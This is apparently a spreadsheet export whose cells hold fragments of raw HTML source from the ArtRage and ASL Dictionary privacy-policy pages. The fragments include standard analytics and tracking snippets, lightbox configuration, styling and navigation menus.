&lt;script id="foobox-free-min-js-before"&gt;
/* Run FooBox FREE (v2.7.25) */_x005F_x000D_
var FOOBOX = window.</t>
  </si>
  <si>
    <t>FOOBOX = {_x005F_x000D_
	ready: true,_x005F_x000D_
	disableOthers: false,_x005F_x000D_
	o: {wordpress: { enabled: true }, countMessage:'image %index of %total', captions: { dataTitle: ["captionTitle","title"], dataDesc: ["captionDesc","description"] }, excludes:'.fbx-link,.nofoobox,.nolightbox,a[href*="pinterest.com/pin/create/button/"]', affiliate : { enabled: false }},_x005F_x000D_
	selectors: [_x005F_x000D_
		".foogallery-container.foogallery-lightbox-foobox", ".foogallery-container.foogallery-lightbox-foobox-free", ".gallery", ".wp-block-gallery", ".wp-caption", ".wp-block-image", "a:has(img[class*=wp-image-])", ".foobox"_x005F_x000D_
	],_x005F_x000D_
	pre: function( $ ){_x005F_x000D_
		// Custom JavaScript (Pre)_x005F_x000D_
		_x005F_x000D_
	},_x005F_x000D_
	post: function( $ ){_x005F_x000D_
		// Custom JavaScript (Post)_x005F_x000D_
		_x005F_x000D_
		// Custom Captions Code_x005F_x000D_
		_x005F_x000D_
	},_x005F_x000D_
	custom: function( $ ){_x005F_x000D_
		// Custom Extra JS_x005F_x000D_
		_x005F_x000D_
	}_x005F_x000D_
};
&lt;/script&gt;
&lt;script src="https://www.artrage.com/wp-content/plugins/foobox-image-lightbox/free/js/foobox.free.min.js?ver=2.7.25" id="foobox-free-min-js"&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://www.artrage.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://www.artrage.com/wp-json/wp/v2/pages/3708" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.artrage.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.artrage.com/wp-includes/wlwmanifest.xml" /&gt;
&lt;meta name="generator" content="WordPress 6.2" /&gt;
&lt;link rel="canonical" href="https://www.artrage.com/privacy/" /&gt;
&lt;link rel="shortlink" href="https://www.artrage.com/?p=3708" /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://www.artrage.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.artrage.com%2Fprivacy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://www.artrage.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.artrage.com%2Fprivacy%2F&amp;#038;format=xml" /&gt;
&lt;meta name="generator" content="Site Kit by Google 1.98.0" /&gt;    
    &lt;script type="text/javascript"&gt;
        var ajaxurl = 'https://www.artrage.com/wp-admin/admin-ajax.php';
    &lt;/script&gt;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'222981454711471'); 
fbq('track', 'PageView');
&lt;/script&gt;
&lt;meta name="mobile-web-app-capable" content="yes"&gt;
&lt;meta name="apple-mobile-web-app-capable" content="yes"&gt;
&lt;meta name="apple-mobile-web-app-title" content="Artrage - "&gt;
&lt;script&gt;
			( function( w, d, s, l, i ) {
				w[l] = w[l] || [];
				w[l].push( {'gtm.start': new Date().getTime(), event: 'gtm.js'} );
				var f = d.getElementsByTagName( s )[0],
					j = d.createElement( s ), dl = l != 'dataLayer' ? '&amp;l=' + l : '';
				j.async = true;
				j.src = 'https://www.googletagmanager.com/gtm.js?id='</t>
  </si>
  <si>
    <t>+ i + dl;
				f.parentNode.insertBefore( j, f );
			} )( window, document, 'script', 'dataLayer', 'GTM-MQNR5MR' );
&lt;/script&gt;
&lt;link rel="icon" href="https://www.artrage.com/wp-content/uploads/2021/08/cropped-ArtRage-6-Logo-32x32.png" sizes="32x32" /&gt;
&lt;link rel="icon" href="https://www.artrage.com/wp-content/uploads/2021/08/cropped-ArtRage-6-Logo-192x192.png" sizes="192x192" /&gt;
&lt;link rel="apple-touch-icon" href="https://www.artrage.com/wp-content/uploads/2021/08/cropped-ArtRage-6-Logo-180x180.png" /&gt;
&lt;meta name="msapplication-TileImage" content="https://www.artrage.com/wp-content/uploads/2021/08/cropped-ArtRage-6-Logo-270x270.png" /&gt;
		&lt;style id="wp-custom-css"&gt;
			.su-box-title {
	color: white;
}		&lt;/style&gt;
		&lt;/head&gt;
&lt;body class="page-template-default page page-id-3708 wp-custom-logo wp-embed-responsive understrap group-blog" itemscope itemtype="http://schema.org/WebSite"&gt;
		&lt;noscript&gt;
			&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-MQNR5MR" height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;
		&lt;/noscript&gt;
		&lt;svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"&gt;&lt;defs&gt;&lt;filter id="wp-duotone-dark-grayscale"&gt;&lt;fecolormatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0</t>
  </si>
  <si>
    <t>.299 .587 .114 0 0</t>
  </si>
  <si>
    <t>.299 .587 .114 0 0 " /&gt;&lt;fecomponenttransfer color-interpolation-filters="sRGB"&gt;&lt;fefuncr type="table" tablevalues="0 0.49803921568627" /&gt;&lt;fefuncg</t>
  </si>
  <si>
    <t>type="table" tablevalues="0 0.49803921568627" /&gt;&lt;fefuncb type="table" tablevalues="0 0.49803921568627"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</si>
  <si>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hidden;"&gt;&lt;defs&gt;&lt;filter id="wp-duotone-grayscale"&gt;&lt;fecolormatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0</t>
  </si>
  <si>
    <t>.299 .587 .114 0 0 " /&gt;&lt;fecomponenttransfer color-interpolation-filters="sRGB"&gt;&lt;fefuncr type="table" tablevalues="0 1" /&gt;&lt;fefuncg</t>
  </si>
  <si>
    <t>type="table" tablevalues="0 1" /&gt;&lt;fefuncb type="table" tablevalues="0 1"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id="wp-duotone-purple-yellow"&gt;&lt;fecolormatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114</t>
  </si>
  <si>
    <t>0 0 .299 .587 .114 0</t>
  </si>
  <si>
    <t>0 .299 .587 .114 0</t>
  </si>
  <si>
    <t>0 .299 .587 .114 0 0 "</t>
  </si>
  <si>
    <t>/&gt;&lt;fecomponenttransfer color-interpolation-filters="sRGB"&gt;&lt;fefuncr type="table" tablevalues="0.54901960784314 0.98823529411765" /&gt;&lt;fefuncg type="table" tablevalues="0 1" /&gt;&lt;fefuncb type="table" tablevalues="0.71764705882353 0.25490196078431"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</si>
  <si>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hidden;"&gt;&lt;defs&gt;&lt;filter id="wp-duotone-blue-red"&gt;&lt;fecolormatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0</t>
  </si>
  <si>
    <t>type="table" tablevalues="0 0.27843137254902" /&gt;&lt;fefuncb type="table" tablevalues="0.5921568627451 0.27843137254902"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id="wp-duotone-midnight"&gt;&lt;fecolormatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114</t>
  </si>
  <si>
    <t>/&gt;&lt;fecomponenttransfer color-interpolation-filters="sRGB"&gt;&lt;fefuncr type="table" tablevalues="0 0" /&gt;&lt;fefuncg type="table" tablevalues="0 0.64705882352941" /&gt;&lt;fefuncb type="table" tablevalues="0 1"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</si>
  <si>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hidden;"&gt;&lt;defs&gt;&lt;filter id="wp-duotone-magenta-yellow"&gt;&lt;fecolormatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0</t>
  </si>
  <si>
    <t>.299 .587 .114 0 0 " /&gt;&lt;fecomponenttransfer color-interpolation-filters="sRGB"&gt;&lt;fefuncr type="table" tablevalues="0.78039215686275 1" /&gt;&lt;fefuncg</t>
  </si>
  <si>
    <t>type="table" tablevalues="0 0.94901960784314" /&gt;&lt;fefuncb type="table" tablevalues="0.35294117647059 0.47058823529412"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id="wp-duotone-purple-green"&gt;&lt;fecolormatrix color-interpolation-filters="sRGB" type="matrix" values=" .299</t>
  </si>
  <si>
    <t>.587 .114 0 0 .299</t>
  </si>
  <si>
    <t>.587 .114 0 0 " /&gt;&lt;fecomponenttransfer color-interpolation-filters="sRGB"&gt;&lt;fefuncr type="table" tablevalues="0.65098039215686 0.40392156862745" /&gt;&lt;fefuncg type="table" tablevalues="0 1" /&gt;&lt;fefuncb type="table" tablevalues="0.44705882352941 0.4"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</si>
  <si>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hidden;"&gt;&lt;defs&gt;&lt;filter id="wp-duotone-blue-orange"&gt;&lt;fecolormatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0</t>
  </si>
  <si>
    <t>.299 .587 .114 0 0 " /&gt;&lt;fecomponenttransfer color-interpolation-filters="sRGB"&gt;&lt;fefuncr type="table" tablevalues="0.098039215686275 1" /&gt;&lt;fefuncg</t>
  </si>
  <si>
    <t>type="table" tablevalues="0 0.66274509803922" /&gt;&lt;fefuncb type="table" tablevalues="0.84705882352941 0.41960784313725" /&gt;&lt;fefunca type="table" tablevalues="1 1" /&gt;&lt;/feComponentTransfer&gt;&lt;fecomposite in2="SourceGraphic" operator="in" /&gt;&lt;/filter&gt;&lt;/defs&gt;&lt;/svg&gt;	&lt;div id="fb-root"&gt;&lt;/div&gt;
	  &lt;script async defer crossorigin="anonymous" src="https://connect.facebook.net/en_GB/sdk.js#xfbml=1&amp;version=v8.0&amp;appId=154313424642512&amp;autoLogAppEvents=1" nonce="xMU4GASZ"&gt;&lt;/script&gt;
&lt;div class="site" id="page"&gt;
	&lt;div id="wrapper-navbar"&gt;
		&lt;a class="skip-link sr-only sr-only-focusable" href="#content"&gt;Skip to content&lt;/a&gt;
		&lt;nav id="main-nav" class="navbar navbar-expand-md navbar-dark bg-dark fixed-top" aria-labelledby="main-nav-label"&gt;
			&lt;h2 id="main-nav-label" class="sr-only"&gt;
				Main Navigation			&lt;/h2&gt;
					&lt;div class="container"&gt;
					&lt;a href="https://www.artrage.com/" class="navbar-brand custom-logo-link" rel="home"&gt;&lt;img width="278" height="123" src="https://www.artrage.com/wp-content/uploads/2021/08/ArtRage-NavBar.png" class="img-fluid" alt="ArtRage Logo" decoding="async" /&gt;&lt;/a&gt;					
				&lt;button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNavDropdown" aria-controls="navbarNavDropdown" aria-expanded="false" aria-label="Toggle navigation"&gt;
					&lt;span class="navbar-toggler-icon"&gt;&lt;/span&gt;
				&lt;/button&gt;
				&lt;div id="navbarNavDropdown" class="collapse navbar-collapse"&gt;&lt;ul id="main-menu" class="navbar-nav ml-auto"&gt;&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-64" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children dropdown menu-item-64 nav-item"&gt;&lt;a title="Products" href="#" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="dropdown-toggle nav-link" id="menu-item-dropdown-64"&gt;Products&lt;/a&gt;
&lt;ul class="dropdown-menu" aria-labelledby="menu-item-dropdown-64" role="menu"&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-139211" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-139211 nav-item"&gt;&lt;a title="ArtRage Store" href="https://www.artrage.com/buy/" class="dropdown-item"&gt;ArtRage Store&lt;/a&gt;&lt;/li&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-68" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-68 nav-item"&gt;&lt;a title="ArtRage Vitae Desktop" href="https://www.artrage.com/artrage/" class="dropdown-item"&gt;ArtRage Vitae Desktop&lt;/a&gt;&lt;/li&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-138089" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-138089 nav-item"&gt;&lt;a title="ArtRage Vitae Mobile" href="https://www.artrage.com/artrage-vitae/" class="dropdown-item"&gt;ArtRage Vitae Mobile&lt;/a&gt;&lt;/li&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-138647" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-138647 nav-item"&gt;&lt;a title="ArtRage 6" href="https://www.artrage.com/artrage-6/" class="dropdown-item"&gt;ArtRage 6&lt;/a&gt;&lt;/li&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-138090" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-138090 nav-item"&gt;&lt;a title="ArtRage Lite" href="https://www.artrage.com/artrage-lite/" class="dropdown-item"&gt;ArtRage Lite&lt;/a&gt;&lt;/li&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-139237" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-139237 nav-item"&gt;&lt;a title="Demos" href="https://www.artrage.com/demos/" class="dropdown-item"&gt;Demos&lt;/a&gt;&lt;/li&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-138237" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-138237 nav-item"&gt;&lt;a title="Member Area" href="https://members.artrage.com" class="dropdown-item"&gt;Member Area&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-69" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children dropdown menu-item-69 nav-item"&gt;&lt;a title="Help" href="#" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="dropdown-toggle nav-link" id="menu-item-dropdown-69"&gt;Help&lt;/a&gt;
&lt;ul class="dropdown-menu" aria-labelledby="menu-item-dropdown-69" role="menu"&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-138091" class="menu-item menu-item-type-post_type menu-item-object-</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html PUBLIC " -//W3C//DTD</t>
  </si>
  <si>
    <t>XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"&gt;
&lt;html xmlns="http://www.w3.org/1999/xhtml" lang="en"&gt;
	&lt;head&gt;
		&lt;title&gt;Privacy Policy - ASL Dictionary - ASL American Sign Language&lt;/title&gt;&lt;meta property="og:site_name" content="ASL Dictionary - ASL American Sign Language" /&gt;
&lt;meta property="og:title" content="Privacy Policy" /&gt;
&lt;meta property="og:description" content="PRIVACY POLICY ​ We DO NOT COLLECT, SAVE, SELL, or USE any information about our customers. This Privacy Policy is between</t>
  </si>
  <si>
    <t>you and Software Studios LLC We are providing this privacy policy so you..." /&gt;
&lt;meta property="og:image" content="https://www.facebook.com/tr?id=607473293059178&amp;ev=PageView&amp;noscript=1" /&gt;
&lt;meta property="og:url" content="https://www.asl-dictionary.com/privacy-policy.html" /&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt;
		&lt;meta name="google-site-verification" content="9EOjoXRZeBDSb3rJAyJ1qbJJK2yQOjR_9I8L7k7lPEw" /&gt;
&lt;!-- Facebook Pixel Code --&gt;
&lt;script&gt;
  !</t>
  </si>
  <si>
    <t>function(f,b,e,v,n,t,s)
  {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
  n.callMethod.apply(n,arguments):n.queue.push(arguments)};
  if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
  n.queue=[];t=b.createElement(e);t.async=!0;
  t.src=v;s=b.getElementsByTagName(e)[0];
  s.parentNode.insertBefore(t,s)}(window, document,'script',
  'https://connect.facebook.net/en_US/fbevents.js');
  fbq('init', '607473293059178');
  fbq('track', 'PageView');
&lt;/script&gt;
&lt;noscript&gt;&lt;img height="1" width="1" style="display:none"
  src="https://www.facebook.com/tr?id=607473293059178&amp;ev=PageView&amp;noscript=1"
/&gt;&lt;/noscript&gt;
&lt;!-- End Facebook Pixel Code --&gt;
		&lt;link id="wsite-base-style" rel="stylesheet" type="text/css" href="//cdn2.editmysite.com/css/sites.css?buildTime=1620339893" /&gt;
&lt;link rel="stylesheet" type="text/css" href="//cdn2.editmysite.com/css/old/fancybox.css?1620154490" /&gt;
&lt;link rel="stylesheet" type="text/css" href="/files/main_style.css?1620318409" title="wsite-theme-css" /&gt;
&lt;style type='text/css'&gt;
.wsite-elements.wsite-not-footer:not(.wsite-header-elements) div.paragraph, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) p, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-block .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-description, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label, #wsite-content div.paragraph, #wsite-content p, #wsite-content .product-block .product-title, #wsite-content .product-description, #wsite-content .wsite-form-field label, #wsite-content .wsite-form-field label, .blog-sidebar div.paragraph, .blog-sidebar p, .blog-sidebar .wsite-form-field label, .blog-sidebar .wsite-form-field label {}
#wsite-content div.paragraph, #wsite-content p, #wsite-content .product-block .product-title, #wsite-content .product-description, #wsite-content .wsite-form-field label, #wsite-content .wsite-form-field label, .blog-sidebar div.paragraph, .blog-sidebar p, .blog-sidebar .wsite-form-field label, .blog-sidebar .wsite-form-field label {}
.wsite-elements.wsite-footer div.paragraph, .wsite-elements.wsite-footer p, .wsite-elements.wsite-footer .product-block .product-title, .wsite-elements.wsite-footer .product-description, .wsite-elements.wsite-footer .wsite-form-field label, .wsite-elements.wsite-footer .wsite-form-field label{}
.wsite-elements.wsite-not-footer:not(.wsite-header-elements) h2, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-long .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-large .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-small .product-title, #wsite-content h2, #wsite-content .product-long .product-title, #wsite-content .product-large .product-title, #wsite-content .product-small .product-title, .blog-sidebar h2 {}
#wsite-content h2, #wsite-content .product-long .product-title, #wsite-content .product-large .product-title, #wsite-content .product-small .product-title, .blog-sidebar h2 {}
.wsite-elements.wsite-footer h2, .wsite-elements.wsite-footer .product-long .product-title, .wsite-elements.wsite-footer .product-large .product-title, .wsite-elements.wsite-footer .product-small .product-title{}
#wsite-title {}
.wsite-menu-default a {}
.wsite-menu a {}
.wsite-image div, .wsite-caption {}
.galleryCaptionInnerText {}
.fancybox-title {}
.wslide-caption-text {}
.wsite-phone {}
.wsite-headline,.wsite-header-section .wsite-content-title {}
.wsite-headline-paragraph,.wsite-header-section .paragraph {}
.wsite-button-inner {}
.wsite-not-footer blockquote {}
.wsite-footer blockquote {}
.blog-header h2 a {}
#wsite-content h2.wsite-product-title {}
.wsite-product .wsite-product-price a {}
@media screen and (min-width: 767px) {.wsite-elements.wsite-not-footer:not(.wsite-header-elements) div.paragraph, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) p, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-block .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-description, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label, #wsite-content div.paragraph, #wsite-content p, #wsite-content .product-block .product-title, #wsite-content .product-description, #wsite-content .wsite-form-field label, #wsite-content .wsite-form-field label, .blog-sidebar div.paragraph, .blog-sidebar p, .blog-sidebar .wsite-form-field label, .blog-sidebar .wsite-form-field label {}
#wsite-content div.paragraph, #wsite-content p, #wsite-content .product-block .product-title, #wsite-content .product-description, #wsite-content .wsite-form-field label, #wsite-content .wsite-form-field label, .blog-sidebar div.paragraph, .blog-sidebar p, .blog-sidebar .wsite-form-field label, .blog-sidebar .wsite-form-field label {}
.wsite-elements.wsite-footer div.paragraph, .wsite-elements.wsite-footer p, .wsite-elements.wsite-footer .product-block .product-title, .wsite-elements.wsite-footer .product-description, .wsite-elements.wsite-footer .wsite-form-field label, .wsite-elements.wsite-footer .wsite-form-field label{}
.wsite-elements.wsite-not-footer:not(.wsite-header-elements) h2, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-long .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-large .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-small .product-title, #wsite-content h2, #wsite-content .product-long .product-title, #wsite-content .product-large .product-title, #wsite-content .product-small .product-title, .blog-sidebar h2 {}
#wsite-content h2, #wsite-content .product-long .product-title, #wsite-content .product-large .product-title, #wsite-content .product-small .product-title, .blog-sidebar h2 {}
.wsite-elements.wsite-footer h2, .wsite-elements.wsite-footer .product-long .product-title, .wsite-elements.wsite-footer .product-large .product-title, .wsite-elements.wsite-footer .product-small .product-title{}
#wsite-title {}
.wsite-menu-default a {}
.wsite-menu a {}
.wsite-image div, .wsite-caption {}
.galleryCaptionInnerText {}
.fancybox-title {}
.wslide-caption-text {}
.wsite-phone {}
.wsite-headline,.wsite-header-section .wsite-content-title {}
.wsite-headline-paragraph,.wsite-header-section .paragraph {}
.wsite-button-inner {}
.wsite-not-footer blockquote {}
.wsite-footer blockquote {}
.blog-header h2 a {}
#wsite-content h2.wsite-product-title {}
.wsite-product .wsite-product-price a {}
}&lt;/style&gt;
		&lt;script src='/files/templateArtifacts.js?1620318409'&gt;&lt;/script&gt;
&lt;script&gt;
var STATIC_BASE = '//cdn1.editmysite.com/';
var ASSETS_BASE = '//cdn2.editmysite.com/';
var STYLE_PREFIX = 'wsite';
&lt;/script&gt;
&lt;script src='https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js'&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="//cdn2.editmysite.com/js/lang/en/stl.js?buildTime=1620154490&amp;"&gt;&lt;/script&gt;
&lt;script src="//cdn2.editmysite.com/js/site/main.js?buildTime=1620339893"&gt;&lt;/script&gt;&lt;script type="text/javascript"&gt;
		function initCustomerAccountsModels() {
					(function(){_W.setup_rpc({"url":"\/ajax\/api\/JsonRPC\/CustomerAccounts\/","actions":{"CustomerAccounts":[{"name":"login","len":2,"multiple":false,"standalone":false},{"name":"logout","len":0,"multiple":false,"standalone":false},{"name":"getSessionDetails","len":0,"multiple":false,"standalone":false},{"name":"getAccountDetails","len":0,"multiple":false,"standalone":false},{"name":"getOrders","len":0,"multiple":false,"standalone":false},{"name":"register","len":4,"multiple":false,"standalone":false},{"name":"emailExists","len":1,"multiple":false,"standalone":false},{"name":"passwordReset","len":1,"multiple":false,"standalone":false},{"name":"passwordUpdate","len":3,"multiple":false,"standalone":false},{"name":"validateSession","len":1,"multiple":false,"standalone":false}]},"namespace":"_W.CustomerAccounts.</t>
  </si>
  <si>
    <t>RPC"});
_W.setup_model_rpc({"rpc_namespace":"_W.CustomerAccounts. RPC","model_namespace":"_W.CustomerAccounts. BackboneModelData","collection_namespace":"_W.CustomerAccounts.</t>
  </si>
  <si>
    <t>BackboneCollectionData","bootstrap_namespace":"_W.CustomerAccounts. BackboneBootstrap","models":{"CustomerAccounts":{"_class":"CustomerAccounts. Model.CustomerAccounts","defaults":null,"validation":null,"types":null,"idAttribute":null,"keydefs":null}},"collections":{"CustomerAccounts":{"_class":"CustomerAccounts.</t>
  </si>
  <si>
    <t xml:space="preserve">Collection. CustomerAccounts"}},"bootstrap":[]});
})();
		}
		if(document.createEvent &amp;&amp; document.addEventListener) {
			var initEvt = document.createEvent('Event');
			initEvt.initEvent('customerAccountsModelsInitialized', true, false);
			document.dispatchEvent(initEvt);
		} else if(document.documentElement.initCustomerAccountsModels === 0){
			document.documentElement.initCustomerAccountsModels++
		}
		&lt;/script&gt;
		</t>
  </si>
  <si>
    <t>&lt;script type="text/javascript"&gt; _ W = _W || {}; _W.securePrefix='www.asl-dictionary.com'; &lt;/script&gt;&lt;script&gt;_W = _W || {};
			_</t>
  </si>
  <si>
    <t>W.customerLocale = "en_US";
			_W.storeName = null;
			_ W.isCheckoutReskin</t>
  </si>
  <si>
    <t>[];&lt;/script&gt;&lt;script type="text/javascript"&gt; _W.recaptchaUrl = "https://www.google.com/recaptcha/api.js"; &lt;/script&gt;&lt;script</t>
  </si>
  <si>
    <t xml:space="preserve">type="text/javascript"&gt;&lt;!--
	function initFlyouts(){
		initPublishedFlyoutMenus(
			[{"id":"417229862816210918","title":"Home","url":"index.html","target":"","nav_menu":false,"nonclickable":false},{"id":"804949869342642062","title":"ASL Dictionary","url":"asl-dictionary.html","target":"","nav_menu":false,"nonclickable":false},{"id":"266500841244809182","title":"Sign Language Dictionary","url":"sign-language-dictionary.html","target":"","nav_menu":false,"nonclickable":false},{"id":"845880218592413093","title":"ASL Translator","url":"asl-translator.html","target":"","nav_menu":false,"nonclickable":false},{"id":"775924322567497690","title":"Technical Support","url":"technical-support.html","target":"","nav_menu":false,"nonclickable":false},{"id":"918145258283148904","title":"Contact Us","url":"contact-us.html","target":"","nav_menu":false,"nonclickable":false},{"id":"402511375400935540","title":"ASL Dictionary for Mac","url":"asl-dictionary-for-mac.html","target":"","nav_menu":false,"nonclickable":false},{"id":"699460680875046754","title":"ASL Dictionary HD for Mac","url":"asl-dictionary-hd-for-mac.html","target":"","nav_menu":false,"nonclickable":false},{"id":"734146501230928451","title":"ASL Dictionary for iPad","url":"asl-dictionary-for-ipad.html","target":"","nav_menu":false,"nonclickable":false},{"id":"417146725491961526","title":"ASL Baby Sign","url":"asl-baby-sign.html","target":"","nav_menu":false,"nonclickable":false},{"id":"851100756861363948","title":"ASL Emergency Signs","url":"asl-emergency-signs.html","target":"","nav_menu":false,"nonclickable":false},{"id":"427067986241168686","title":"Learn ASL American Sign language","url":"learn-asl-american-sign-language.html","target":"","nav_menu":false,"nonclickable":false},{"id":"515172815573229809","title":"ASL American Sign Language","url":"asl-american-sign-language.html","target":"","nav_menu":false,"nonclickable":false},{"id":"256833864713870832","title":"ASL Fingerspell","url":"asl-fingerspell.html","target":"","nav_menu":false,"nonclickable":false},{"id":"315355773524598400","title":"Privacy Policy","url":"privacy-policy.html","target":"","nav_menu":false,"nonclickable":false}],
			"315355773524598400",
			'',
			'active',
			false,
			{"navigation\/item":"&lt;li {{#id}}id=\"{{id}}\"{{\/id}} class=\"wsite-menu-item-wrap\"&gt;\n\t&lt;a\n\t\t{{^nonclickable}}\n\t\t\t{{^nav_menu}}\n\t\t\t\thref=\"{{url}}\"\n\t\t\t{{\/nav_menu}}\n\t\t{{\/nonclickable}}\n\t\t{{#target}}\n\t\t\ttarget=\"{{target}}\"\n\t\t{{\/target}}\n\t\t{{#membership_required}}\n\t\t\tdata-membership-required=\"{{.}}\"\n\t\t{{\/membership_required}}\n\t\tclass=\"wsite-menu-item\"\n\t\t&gt;\n\t\t{{{title_html}}}\n\t&lt;\/a&gt;\n\t{{#has_children}}{{&gt; navigation\/flyout\/list}}{{\/has_children}}\n&lt;\/li&gt;\n","navigation\/flyout\/list":"&lt;div class=\"wsite-menu-wrap\" style=\"display:none\"&gt;\n\t&lt;ul class=\"wsite-menu\"&gt;\n\t\t{{#children}}{{&gt; navigation\/flyout\/item}}{{\/children}}\n\t&lt;\/ul&gt;\n&lt;\/div&gt;\n","navigation\/flyout\/item":"&lt;li {{#id}}id=\"{{id}}\"{{\/id}}\n\tclass=\"wsite-menu-subitem-wrap {{#is_current}}wsite-nav-current{{\/is_current}}\"\n\t&gt;\n\t&lt;a\n\t\t{{^nonclickable}}\n\t\t\t{{^nav_menu}}\n\t\t\t\thref=\"{{url}}\"\n\t\t\t{{\/nav_menu}}\n\t\t{{\/nonclickable}}\n\t\t{{#target}}\n\t\t\ttarget=\"{{target}}\"\n\t\t{{\/target}}\n\t\tclass=\"wsite-menu-subitem\"\n\t\t&gt;\n\t\t&lt;span class=\"wsite-menu-title\"&gt;\n\t\t\t{{{title_html}}}\n\t\t&lt;\/span&gt;{{#has_children}}&lt;span class=\"wsite-menu-arrow\"&gt;&amp;gt;&lt;\/span&gt;{{\/has_children}}\n\t&lt;\/a&gt;\n\t{{#has_children}}{{&gt; navigation\/flyout\/list}}{{\/has_children}}\n&lt;\/li&gt;\n"},
			{}
		)
	}
//--&gt;
&lt;/script&gt;
	&lt;/head&gt;
	&lt;body class=" wsite-theme-light  wsite-page-privacy-policy"&gt;&lt;div id="wrapper"&gt;
        &lt;div id="header"&gt;
            &lt;div id="header-top"&gt;
                &lt;div id="navigation"&gt;
                    &lt;ul class="wsite-menu-default"&gt;
                    		&lt;li id="pg417229862816210918" class="wsite-menu-item-wrap"&gt;
                    			&lt;a
                    						href="/"
                    				class="wsite-menu-item"
                    				&gt;
                    				Home
                    			&lt;/a&gt;
                    		&lt;/li&gt;
                    		&lt;li id="pg804949869342642062" class="wsite-menu-item-wrap"&gt;
                    			&lt;a
                    						href="/asl-dictionary.html"
                    				class="wsite-menu-item"
                    				&gt;
                    				ASL Dictionary
                    			&lt;/a&gt;
                    		 &lt;/li&gt;
                    		&lt;li id="pg266500841244809182" class="wsite-menu-item-wrap"&gt;
                    			&lt;a
                    						href="/sign-language-dictionary.html"
                    				class="wsite-menu-item"
                    				&gt;
                    				Sign Language Dictionary
                    			&lt;/a&gt;
                    		&lt;/li&gt;
                    		&lt;li id="pg845880218592413093" class="wsite-menu-item-wrap"&gt;
                    			&lt;a
                    						href="/asl-translator.html"
                    				class="wsite-menu-item"
                    				&gt;
                    				ASL Translator
                    			&lt;/a&gt;
                    		&lt;/li&gt;
                    		&lt;li id="pg775924322567497690" class="wsite-menu-item-wrap"&gt;
                    			&lt;a
                    						href="/technical-support.html"
                    				class="wsite-menu-item"
                    				&gt;
